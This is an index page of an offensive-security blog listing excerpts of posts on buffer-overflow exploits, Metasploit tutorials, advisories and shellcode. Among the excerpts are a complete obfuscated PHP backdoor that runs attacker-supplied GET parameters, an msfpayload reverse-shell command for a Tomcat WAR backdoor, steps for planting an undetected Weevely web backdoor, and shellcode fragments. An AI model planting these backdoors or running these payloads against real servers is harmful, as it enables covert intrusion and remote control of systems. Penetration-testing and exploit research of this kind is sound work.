Spentera Blog (Page 2)

BlazeVideo HDTV Player 6.x Buffer Overflow (another version)

Hi again, we tried to make a universal DEP and ASLR bypass version on BlazeVideo HDTV Player 6.x. This exploit is already public, but we just want to make it universal. Take a look at mona.py ? awesome tool developed by corelanc0d3r and his team So here is the

Exploit Development

ScriptFTP <=3.3 Remote Buffer Overflow Exploit (MSF)

You might be read about the previous post ScriptFTP Remote BOF, if you are a Metasploit user, you can add this exploit module to your Metasploit Framework. Update: Metasploit has released module for ScriptFTP. You can use it now on Metasploit. . Credit goes to: Cyberheb Otoy TecR0c mr_me

Exploit Development

Porting Your Exploit to Metasploit

Beberapa waktu yang lalu saya udah memberikan tutorial basic exploit development (direct return technique) dan exploit development berbasis SEH. Sekarang mari kita porting exploit tersebut ke Metasploit Framework agar exploit tersebut semakin reliable dan bisa menggunakan macam-macam payload, fitur-fitur canggih yang ada di Metasploit. Kita akan meng-konversi exploit yang pertama,

Tutorials

Non-alphanumeric PHP Simple Backdoor

After read and learn about non-alphanumeric code in php, i decide to write my own non-alphanumeric PHP simple backdoor. <? $_="{"; #XOR char $_=($_^"<").($_^">;").($_^"/"); #XOR = GET ?> <?=${'_'.$_}["_"](${'_'.$_}["__"]);?> well, it’s a quite simple script, just a XOR function over strings. By XOR-ing “

Security Advisory

ScriptFTP <=3.3 Remote Buffer Overflow Exploit (0day)

ScriptFTP client is vulnerable against remote buffer overflow vulnerability. The condition is triggered while processing LIST FTP command with excessive length. The vulnerability is confirmed in version 3.3. Other version may also be affected. Software Description ScriptFTP is a FTP client designed to automate file transfers. It follows the

Exploit Development

SEH Based Stack Overflow - The Basic

Kali ini saya akan coba tehnik lain dari stack overflow, yaitu stack overflow berbasis SEH. Apa itu SEH? silakan dibaca diliteratur-literatur berikut: Structured Exception Handling Win32 Exception handling for assembler programmers Tidak ada yang lebih menyenangkan daripada belajar sambil mencoba. Kita akan mencoba SEH based stack overflow pada program yang

Tutorials

MSF Postgres Problem on BT5

If you read this post then I bet you have the same problem with me. When I tried to run the msfconsole on my BT5 I have this buggy information. [-] Failed to connect to the database: could not connect to server: Connection refused Is the server running on host

Tutorials

Silent Backdoor with Weevely

Ever think to gain access to your backdoor undetected? Well, maybe not all web administrators examine their php files? Weevely is the answer. Just follow these actions (I was doing this on Backtrack 5): root@bt:~# >cd /pentest/backdoors/web/weevely root@bt:/pentest/backdoors/web/weevely#./main.py

Exploit Development

Mel0nPlayer 1.0.11.x Denial of Service POC

Software Description Mel0n Player is a famous software in Indonesia to play songs that are provided by the Melon portal (http://www.melon.co.id). This software can play any music file types such as mp3, wav, wma, mp4, and others. This player can also play the files on your

Tutorials

Metasploit Meterpreter Command Shell Upgrade

Seeing is believing ? root@bt:~# msfconsole =[ metasploit v3.8.0-dev [core:3.8 api:1.0] + -- --=[ 707 exploits - 359 auxiliary - 57 post + -- --=[ 225 payloads - 27 encoders - 8 nops =[ svn r13065 updated today (2011.06.29) msf > use exploit/windows/smb/ms08_

Exploit Development

Some Documents of File Specifications/Formats

Here are some documents to help you understand some file formats/headers, for file format fuzzing purpose: WAVE PCM soundfile format (RIFF) https://ccrma.stanford.edu/courses/422/projects/WaveFormat/ ZIP File format specification http://www.pkware.com/documents/casestudies/APPNOTE.TXT MPEG File format http://www.mpgedit.org/mpgedit/

Tutorials

Backtrack 5: How to install VMware Workstation 7.1.3

So I want to install VMware Workstation 7.1.3 on Backtrack 5, but there were errors after I ran the binary (e.g: ./VMware-Workstation-Full-7.1.3-324285.x86_64.bundle), so here’s the solution: Prepare the Kernel Look here: http://www.backtrack-linux.org/forums/backtrack-5-how-tos/40276-backtrack-5-how-prepare-kernel-sources-vmare-tools-drivers-etc.html Download

Tutorials

Dump Windows System Info

When you were asked to collect all Windows system information such as list of users, services, software installed and its version, Windows update history etc, you probably want to see these tools: System Information Collector WinUpdatesList v1.31 WinAudit Freeware v2.28.2 SAM/Password Extractor pwdump7* ( v7.1 ) (detected

Tutorials

Create a WAR backdoor with Metasploit

Facing a tomcat server.. and need to upload a WAR backdoor…??, well… we can create a WAR backdoor very easily with Metasploit, ok follow this steps: 1. Creating the backdoor. dudul@banget:~$ msfpayload linux/x86/shell_reverse_tcp LHOST=172.16.96.1 W &gt; dudul.

Tutorials

Remove Comments from Configuration

If you want to configure something, sometimes it contains the comments from the developer which help us to figure out options of arguments that will be used. But if you are already familiar with the configuration, comments can be annoying, and here we provide a way to remove them (using

Security Advisory

QuickShare File Server 1.2.1 FTP Directory Traversal Vulnerability

QuickShare File Server is prone to a FTP directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue will allow an attacker to modify files outside the destination directory and possibly gain access to the system. Software Description QuickShare File Server is a easy to use file

Exploit Development

FTPGetter v3.58.0.21 Buffer Overflow (PASV) Exploit

A vulnerability has been discovered in FTPGetter, which can be exploited by malicious people to compromise a user’s system. The issue is likely due to insufficient bounds checking and presents itself when the affected FTP client makes a connection to a malicious server that is running PASV mode.

Tutorials

ShodanHQ Queries For Penetration Tester

Have you ever heard SHODAN Search Engine? SHODAN is a search engine that lets you find specific computers (routers, servers, etc.) using a variety of filters. Some have also described it as a public port scan directory or a search engine of banners. SHODAN also lets you use boolean operators

General

ShodanHQ Exploits Search Engine

For those who want to search a vulnerable version of applications during vulnerability assessment or penetration testing, take a look at ShodanHQ new feature, a ShodanHQ Exploits Search Engine. It support CVE, OSVDB, Security Focus BID, Microsoft Security Bulletin(MSB), and Exploit-DB. Just input the application, device, brand, or version

General

inSSIDer 2 now in linux

inSSIDer is the first award-winning wi-fi scanner to come out of the woodwork since the netstumbler era. Use inSSIDer to war drive or troubleshoot Wi-Fi channel placement. This program will display all Wi-Fi access points within range and display their MAC address, SSID, RSSI, Channel, Vendor, Encryption, Max Rate and

Exploit Development

HttpBlitz Web Server Denial Of Service Exploit

HttpBlitz Server is prone to a remote denial-of-service vulnerability. Attackers can exploit this issue to cause the application to crash, denying service to legitimate users. #!/usr/bin/python # Title: HttpBlitz DOS # Date: 12/24/2010 # Author: otoy # Software Link: http://sourceforge.net/projects/httpblitz/files/HttpBlitz.msi/download # Tested on:

Security Advisory

SolarFTP 2.0 Multiple Commands Denial of Service Vulnerability

SolarFTP Server 2.0 is prone to a denial of service condition. It fails to properly sanitize user-supplied input resulting in a denial of service. With a specially crafted ‘USER’, ‘APPE’, ‘GET’, ‘PUT’, and ‘NLST’ command, a remote attacker can

Exploit Development

27 Bytes - Windows XP SP3 (en) calc win32 Shellcode

/* ========================================================================== ___ _ __ __ __ _ __ ____/ (_)___ _(_) /_____ _/ / ___ _____/ /_ (_)___/ /___ ____ _ / __ / / __ `/ / __/ __ `/ /_____/ _ / ___/ __ / / __ / __ / __ `/ / /_/ / / /_/ / / /_/ /_/ / /_____/ __/ /__/ / / / / /_/ / / / / /_/ / __,_/_/__, /_/__/__,_/_/ ___/___/_/ /_/_/__,_/_/ /_/__,_/ /____/ http://www.digital-echidna.org ========================================================================== Title : Windows XP SP3 (EN) 32-bit - calc Shellcode 27 bytes Author : otoy Tested on : WinXP Pro SP3 (EN) 32 bit Greetz : say hello to all digital-echidna org crew: modpr0be, bean, s3o, d00m, n0rf0x, fm, gotechidna, manix special thx to offsec, exploit-db and corelan team */ /*shellcodetest.

Exploit Development

53 bytes - Windows XP SP3 (en) notepad.exe win32 Shellcode

Finally, my first win32 shellcode.. This will execute notepad.exe when loaded. Run on Windows XP SP3 English. /* (o_Ov) say hello to all digital-echidna org crew: otoy, bean, s3o, d00m, n0rf0x, fm, gotechidna, manix special thx to offsec, exploit-db, and corelan team */ /*shellcodetest.c*/ char code[] = "\x31\xc0\x50\

Tutorials

0day Linux Escalation Privilege Exploit Collection

I have created a script that contains of local privilege escalation exploits that was published on Exploit-DB.com between October – November 2010. Take a look at here 201011-0day-linux-exploit.tar.bz2 (md5sum: b890f6aeccf1721267166e221cd547df) *Update: I rename the file and make the script more comfort. Please note that I am not